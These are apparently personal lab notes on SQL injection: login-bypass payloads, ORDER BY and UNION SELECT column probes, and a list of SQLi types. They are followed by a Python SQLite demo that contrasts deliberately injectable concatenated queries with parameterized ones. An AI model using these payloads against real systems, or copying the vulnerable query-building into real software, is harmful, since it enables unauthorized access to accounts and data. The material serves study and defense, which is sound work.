Jackmeister's Playbook
PSG SQL

Basic SQL Login Auth bypass

Note: inside Burp Repeater, remember to press Ctrl+U to URL-encode the payload (spaces become +):

' order by 1 --

will become

'+order+by+1+--

Vuln code

`SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'`

Crafting

SELECT * FROM users WHERE username = 'administrator' --' AND password = 'bluecheese'

SELECT * FROM users WHERE username = '' OR 1=1 --' AND password = 'bluecheese'

Exploit Delivery

administrator' --
' OR 1=1 --

Type of SQL injections

  • In-band SQLi: the result comes back in the application's normal response, aka normal SQLi

  • Inferential SQLi: no result comes back in the response; you infer it from behaviour, aka blind SQLi

  • Out-of-band SQLi: the database sends the result to a server you control, which acts as a man in the middle and relays it back to you

UNION attack to retrieve data from other table

Vuln code

select * from categoryTable where category='Corporate Gifts'

Determine number of columns

' order by 1 -- 
' order by 2 --

Combine order by with select query

select * from categoryTable where category='' order by 1 --anything here gets ignored 

UNION SELECT can be used to double check the number of columns

' UNION SELECT NULL-- 
' UNION SELECT NULL,NULL-- 
' UNION SELECT NULL,NULL,NULL--

Ensure same data type

Each column in the injected SELECT must have the same data type as the corresponding column of the original query, e.g. a string where a string is expected, a number where a number is expected:

'a' , 'a'
123 , 'a123'

For each column, check whether it holds:

  • characters?

  • alphanumeric?

  • numbers?
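Added example, not from the playbook: the login and category queries from this page, each built once by string concatenation (the "Vuln code") and once with bound parameters, run against an in-memory SQLite database with constructed rows. The table contents, the `ADMIN-PASSWORD-PLACEHOLDER` value and the function names (`login_vulnerable`, `login_safe`, `category_vulnerable`, `category_safe`, `try_query`) are all assumptions made for this demo. It shows why the auth-bypass payloads and the ORDER BY / UNION SELECT NULL column probes above work against concatenated SQL, and that the same inputs are inert once they are passed as parameters.

```python
import sqlite3

# Constructed sample database (not from the page): a users table for the login
# query and a three-column categoryTable for the category query.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('wiener', 'bluecheese'),
                                 ('administrator', 'ADMIN-PASSWORD-PLACEHOLDER');
        CREATE TABLE categoryTable (id INTEGER, category TEXT, description TEXT);
        INSERT INTO categoryTable VALUES (1, 'Corporate Gifts', 'Mugs and pens'),
                                         (2, 'Toys', 'Plush animals');
    """)
    return conn


def login_vulnerable(conn, username, password):
    """The page's 'Vuln code': user input pasted straight into the SQL text."""
    sql = f"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'"
    return conn.execute(sql).fetchall()


def login_safe(conn, username, password):
    """Same query with bound parameters: input is data, never SQL syntax."""
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def category_vulnerable(conn, category):
    """The page's category lookup, again built by concatenation."""
    sql = f"SELECT * FROM categoryTable WHERE category='{category}'"
    return conn.execute(sql).fetchall()


def category_safe(conn, category):
    """Parameterized category lookup."""
    sql = "SELECT * FROM categoryTable WHERE category=?"
    return conn.execute(sql, (category,)).fetchall()


def try_query(fn, conn, value):
    """Run a query function and report ('ok', rows) or ('error', message).
    The error / no-error difference is exactly what the ORDER BY and
    UNION SELECT NULL probes on the page use to count columns, and those
    database errors are also what a defender will see in the DB logs."""
    try:
        return ("ok", fn(conn, value))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    # Auth-bypass payloads from the page against the concatenated query ...
    print(login_vulnerable(db, "administrator' --", "wrong"))   # administrator row, password never checked
    print(login_vulnerable(db, "' OR 1=1 --", "wrong"))         # every row
    # ... and against the parameterized one: the quote and comment are just characters.
    print(login_safe(db, "administrator' --", "wrong"))         # []
    print(login_safe(db, "' OR 1=1 --", "wrong"))               # []
    # Column counting: the table has 3 columns, so ORDER BY 4 and a 2-NULL UNION fail.
    print(try_query(category_vulnerable, db, "' order by 3--"))
    print(try_query(category_vulnerable, db, "' order by 4--"))
    print(try_query(category_vulnerable, db, "' UNION SELECT NULL,NULL--"))
    print(try_query(category_vulnerable, db, "' UNION SELECT NULL,NULL,NULL--"))
    # The parameterized lookup just searches for a category literally named like the payload.
    print(category_safe(db, "' UNION SELECT NULL,NULL,NULL--"))  # []
```

Two caveats on this demo: SQLite is loosely typed, so the "ensure same data type" check above does not raise an error here, whereas stricter engines such as PostgreSQL reject a UNION whose column types disagree; and the fix shown is the parameterized form, which is the control to look for when reviewing code rather than input filtering of quotes or `--`.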
